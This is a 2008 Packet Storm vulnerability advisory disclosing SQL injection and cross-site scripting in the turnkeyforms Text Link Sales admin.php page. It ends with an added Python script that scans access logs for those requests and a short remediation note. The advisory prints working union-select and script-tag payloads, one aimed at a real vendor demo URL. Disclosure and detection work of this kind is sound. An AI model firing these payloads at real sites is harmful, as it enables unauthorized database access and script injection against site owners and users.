textlinksales-sqlxss.txt

2008-11-16T00:00:00
ID PACKETSTORM:71989
Type packetstorm
Reporter ZoRLu
Modified 2008-11-16T00:00:00

Description

`[~] turnkeyforms Text Link Sales Remote Sql inj & xss  
[~]  
[~]----------------------------------------------------------  
[~] Discovered By: ZoRLu  
[~]  
[~] Date: 14.11.2008  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] contact: trt-turk@hotmail.com  
[~]  
[~] NOTE: LONELINESS HAS LOST ITS MEANING IN MY LONELINESS : ( (  
[~]  
[~] my bug number now: 43  
[~]  
[~] my target bug number: 100  
[~]  
[~] -----------------------------------------------------------  
  
  
Exploit: sql inj  
  
http://localhost/script/admin.php?a=users&id=[SQL]  
  
  
[SQL]  
  
999+union+select+1,user(),database(),version(),5,6,7--  
  
  
sql for demo:  
  
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--  
  
  
xss:  
  
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id="><script>alert()</script>  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke & all Muslim HaCkeRs  
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------  
  
`
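
For a defender, both request patterns above share one property: the id parameter of admin.php?a=users carries something other than a plain integer. The following is an added example, not part of the original advisory or of the vendor's code, that scans web access-log lines for such requests. The log lines, the combined log format, and the names scan and classify_id are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Nov/2008:10:00:01 +0000] "GET /textlinkads/admin.php?a=users&id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [16/Nov/2008:10:00:07 +0000] "GET /textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7-- HTTP/1.1" 200 4870',
    '203.0.113.9 - - [16/Nov/2008:10:00:15 +0000] "GET /textlinkads/admin.php?a=users&id=%22%3E%3Cscript%3Ealert()%3C/script%3E HTTP/1.1" 200 4901',
    '203.0.113.7 - - [16/Nov/2008:10:00:20 +0000] "GET /textlinkads/index.php?id=abc HTTP/1.1" 200 830',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_RE = re.compile(r"\b(union|select)\b|--|/\*", re.I)
MARKUP_RE = re.compile(r"[<>\"']")


def classify_id(value):
    """Label a decoded id value; only a short run of digits is expected."""
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    if SQL_RE.search(value):
        return "sql"
    if MARKUP_RE.search(value):
        return "markup"
    return "non-numeric"


def scan(lines):
    """Return (client_ip, label, decoded_id) for admin.php?a=users requests
    whose id parameter is not a plain integer."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        # parse_qs percent-decodes values and turns '+' into a space.
        params = parse_qs(url.query, keep_blank_values=True)
        if not url.path.endswith("/admin.php") or params.get("a") != ["users"]:
            continue
        for value in params.get("id", []):
            label = classify_id(value)
            if label != "ok":
                findings.append((line.split()[0], label, value))
    return findings


if __name__ == "__main__":
    for client, label, value in scan(SAMPLE_LOG):
        print(client, label, repr(value))
```

The same integer-only rule belongs in the application itself: cast or validate id before it reaches the query, bind it as a parameter, and HTML-encode it wherever it is echoed back.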